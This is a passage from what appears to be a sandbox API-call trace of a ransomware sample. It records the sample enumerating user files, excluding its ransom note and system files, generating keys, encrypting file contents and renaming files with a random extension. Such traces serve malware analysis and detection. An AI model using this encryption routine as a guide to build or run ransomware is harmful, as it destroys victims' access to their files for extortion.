18 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.266] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.266] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.266] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.266] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.266] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.266] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.266] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.266] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.266] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.266] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.266] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.266] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp") returned 69 [0086.266] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp.tqQnwY9") returned 77 [0086.267] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\aswtjl_ki3sxv4p.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp.tqQnwY9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\aswtjl_ki3sxv4p.bmp.tqqnwy9"), dwFlags=0x0) returned 1 [0086.267] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.267] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.268] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.268] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf94b8a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf94b8a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf94b8a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0086.268] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0086.268] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf94b8a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf94b8a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf94b8a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0086.268] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0086.268] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.268] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0086.268] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0086.268] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0086.268] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0086.268] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.268] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.268] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.268] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\jkbimi8.tmp" [0086.268] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0086.269] CloseHandle (hObject=0x0) returned 0 [0086.269] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.269] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43cd6050, ftCreationTime.dwHighDateTime=0x1d4c76e, ftLastAccessTime.dwLowDateTime=0x19a04270, ftLastAccessTime.dwHighDateTime=0x1d4c719, ftLastWriteTime.dwLowDateTime=0x19a04270, ftLastWriteTime.dwHighDateTime=0x1d4c719, nFileSizeHigh=0x0, nFileSizeLow=0xc25f, dwReserved0=0x0, dwReserved1=0x0, cFileName="KHINzcSap9DzrT.bmp", cAlternateFileName="KHINZC~1.BMP")) returned 1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="autorun.inf") returned 1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="boot.ini") returned 1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="desktop.ini") returned 1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="ntuser.dat") returned -1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="iconcache.db") returned 1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="bootsect.bak") returned 1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="ntuser.dat.log") returned -1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="thumbs.db") returned -1 [0086.269] lstrcmpiW (lpString1="KHINzcSap9DzrT.bmp", lpString2="Bootfont.bin") returned 1 [0086.269] lstrlenW (lpString="KHINzcSap9DzrT.bmp") returned 18 [0086.269] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.269] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.269] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.269] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.269] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.270] lstrlenW (lpString="KHINzcSap9DzrT.bmp") returned 18 [0086.270] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.270] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="KHINzcSap9DzrT.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp" [0086.270] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\KHINzcSap9DzrT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\khinzcsap9dzrt.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0086.270] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=49759) returned 1 [0086.270] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0086.270] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.270] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.270] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.270] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.271] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0086.271] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.272] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.272] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.273] CloseHandle (hObject=0x43c) returned 1 [0086.273] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.273] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0086.274] CloseHandle (hObject=0x0) returned 0 [0086.274] CloseHandle (hObject=0x438) returned 1 [0086.274] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.274] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.274] GetTickCount () returned 0x114e051 [0086.274] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.274] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.274] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.275] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.275] lstrlenA (lpString="kernel32.dll") returned 12 [0086.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.275] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.275] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.275] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.275] lstrlenA (lpString="ADDATOMA") returned 8 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.275] lstrlenA (lpString="ADDATOMW") returned 8 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.275] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.275] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.275] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.276] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.276] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.276] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.276] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.276] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.276] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.276] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.276] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.276] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.276] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.276] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.276] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.276] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.276] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.276] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.276] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.276] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.276] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.276] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.277] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.277] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.277] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.277] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.277] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.277] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.277] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.277] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.277] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.277] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.277] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.277] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.277] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.277] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.277] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.277] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.277] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.277] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.277] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.278] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.278] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.278] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.278] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.278] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.278] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.278] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.278] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.278] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.278] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.278] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.278] lstrlenA (lpString="BEEP") returned 4 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.278] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.278] lstrcpyA (in: lpString1=0x3f2cf70, 